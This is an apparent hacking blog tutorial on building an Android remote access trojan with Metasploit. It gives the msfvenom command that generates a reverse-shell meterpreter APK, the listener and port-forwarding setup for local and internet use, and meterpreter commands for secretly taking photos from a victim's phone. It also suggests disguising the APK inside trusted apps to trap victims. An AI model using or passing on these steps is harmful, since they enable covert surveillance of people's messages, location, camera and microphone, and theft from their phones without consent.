Welcome back, my curious hackers. Today ill be showing you how to create an android RAT(Remote Administration Tool). There are more than 2 billion Android devices active each month, any of which can be hacked with the use of a remote administration tool, more commonly known as a RAT. A RAT can help attacker monitor a device’s location, see SMS messages, take camera snapshots, and even record with the microphone without the user knowing.
First of all we would guide you on how to create android RAT using Metasploit.
Steps To Create Android RAT Using Metasploit:
So now lets get into it.
- Open Terminal.
- We are going to use Metasploit Venom Framework to create the exploit/backdoor for this tutorial.
- Use this command to get you local ip.
Im using wlan0. So my local ip or inet ip is 192.168.0.58. As you can see from the pic above.
4.Now we have to create exploit/backdoor for the victim. Use this command to generate the exploit/Backdoor for the victim.
msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker_system_local_ip> LPORT=4444 R > stalker.apk
Let me explain the above Command so we are using msfvenom as the exploit generator for an android using Meterpreter for the reverse connection to the attacker’s system. LHOST defines the attackers IP address where he will get the reverse connection from the victim. And same with the LPORT connection will be made on port 4444 and R > is used to generate the executable. This would create an infected apk. You can select LPORT by yourself or let it be default 4444.
Now we are all ready for the next step as this payload use reverse_tcp so the attacker will be listening to the port specified in the payload for a reverse connection from the victim.
So now we need to set up a handler to handle incoming connections to the port let’s do it.
5. Type msfconsole in terminal to open metasploit.
6. To setup the handler enter the following commands.
set payload android/meterpreter/reverse_tcp
7. Remember your local ip and the port while creating the apk. the following screenshots tells how to set LHOST, LPORT and start the exploit.
When that infected apk will be installed on any android device on the local network a reverse meterpreter session will be opened. Which means now you have full access to the victims phone.
Now you can use various commands to get your desired data from the victims phone. For example if you want to take a picture from that mobile phone. You can type webcam_list. This will show you the list of web cams on victims device. now type webcam_snap 2 and BOOM you just captured a pic from victims phone.
The process to create a RAT for WAN is just a little bit different. The only thing you have to do is to portforward your local ip from your router and to create that apk on your Public IP. Basically we try to establish the following connection in WAN.
Create infected apk:
To create an infected apk for wan you just have to use your public ip instead of your local ip.
msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker_public_ip> LPORT=4444 R > stalker.apk
you can use various sites to get your public ip. The one i use to view my local ip is wtfismyip.com . Im sure you wont be using this site. HAHAHAHAHHA
Port forwad your local ip:
- Login to your Router by your default gateway.
- Now go to port forwarding tab and port forward your local ip and use the same port you used while creating the infected apk. As, shown below in the image.
Thats how you have to port forward your local ip and port. Here the ip you have to use should be your local ip. The ip(10.0.0.2) shown in the image is not my local ip but in this tutorial ill pretend that this is my local ip.
REST of all the process is same and make sure to set the local IP as LHOST in both cases LAN and WAN. And set the LPORT the one you set while creating that infected apk.
You can also use different tools to merge this infected apk with some trusted android applications to trap the victim.
There are other tools like AhMyth etc. which are a bit easy to use and have good user interface. There is an android RAT named as DENDROID which was first available at Dark Market for $300 but after sometime it get leaked and now its easily available. Ill soon write a blog on how to setup DENDROID for Remote Administration and other tools like Ahmyth which are a bit easy to use.
Feel free to comment if you have any problem in the above process and stay tuned.